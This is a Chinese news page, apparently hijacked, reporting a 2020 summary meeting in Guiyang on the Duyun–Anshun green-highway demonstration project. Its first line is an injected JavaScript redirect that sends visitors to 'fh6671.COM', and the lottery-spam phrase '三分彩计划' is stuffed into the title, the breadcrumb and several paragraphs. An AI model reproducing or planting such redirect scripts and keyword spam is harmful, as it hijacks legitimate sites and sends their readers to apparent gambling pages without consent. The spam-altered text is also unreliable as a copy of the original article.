function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl();

三分彩计划

交通运输部主管  中国交通报社主办

中国交通新闻网三分彩计划  > 直通地方

二公院承担的首个“绿色公路”示范创建咨询项目成果总结会成功召开

2020-11-18 14:01:07 来源:中国交通新闻网 作者:张静波


2020年11月6日至7日,贵州高速集团依据《交通运输部办公厅关于深化绿色公路建设做好试点项目技术总结的通知》(交办公路函[2020]1250号)在贵阳主持召开了“贵州省都匀至安顺项目绿色公路示范创建成果总结会”。会议特邀专家和交通运输部公路局、交通运输部规划研究院、贵州省交通运输厅、贵州高速集团、都安项目办及都安项目设计、施工、BIM咨询、钢结构咨询、环水保咨询等单位的代表参加了会议。二公院三分院副院长曾超、工研院副院长夏飞、设计负责人刘云出席了会议。

三分彩计划会上,二公院都安绿色公路、品质工程示范创建咨询项目负责人张静波代表都安项目从设计、施工、管理三个方面就绿色公路五大主要任务(统筹资源利用,实现集约节约;加强生态保护,注重自然和谐;着眼周期成本,强化建养并重实施创新驱动,实现科学高效;开展专项行动,打造示范工程)、五大专项行动(“零弃方、少借方”、改扩建工程绿色升级、积极应用BIM新技术、推进绿色服务区建设、拓展公路旅游功能)的落实情况、示范创建取得的成果及下一阶段工作计划向各位领导、专家及代表作了汇报。

与会专家考察了工程现场,听取了项目汇报,审阅了相关技术资料,经质询讨论,一致认为:

1、本项目绿色公路示范工程建设总结报告从规划设计、施工管理两方面对工程绿色公路建设的完成情况及取得的成果和经验进行了总结。报告资料齐全、体系完备、内容丰富、数据翔实,符合《交通运输部办公厅关于深化绿色公路建设做好试点项目技术总结的通知》要求。

2、本项目根据贵州省生态环境特点和山区高速公路工程特点,按照交通运输部《关于实施绿色公路建设的指导意见》、《绿色公路建设技术指南》等相关要求,全面完成了《贵州省都匀至安顺公路绿色公路建设典型示范工程实施方案》的主要内容。本项目在绿色理念、绿色公路技术和绿色公路建设管理方面积极创新,创新了BIM技术数字化与信息化集成和工点技术应用,创建了科学高效的绿色公路建设全过程管理考核制度,取得了显著的环境、经济和社会效益。本项目绿色公路建设成果具有良好的推广应用前景,对全国绿色公路建设具有示范引领作用。


中国交通新闻网版权及免责声明:
1、凡本网注明“来源:中国交通报”、“来源:中国交通新闻网” 的所有作品,版权均属于中国交通新闻网,未经本网授权,任何单位及个人不得转载、摘编或以其他方式使用上述作品。已经本网授权使用作品的,应在授权范围 内使用,并注明“来源:中国交通新闻网”。违反上述声明者,本网将追究其相关法律责任。
2、凡本网注明 “来源:XXX(非中国交通新闻网)” 的作品,均转载自其他媒体,转载目的在于传递更多信息,并不代表本网赞同其观点和对其真实性负责。
3、如因作品内容、版权和其他问题需要同本网联系的,请在30日内进行。

新媒体

热门推荐更多>>

问计于民问计于网

三分彩计划围绕党中央、国务院重大决策部署和交通运输部党组中心工作,倾听群众呼声、查找突出问题、吸收基层智慧,更好服务人民、服务大局、服务基层。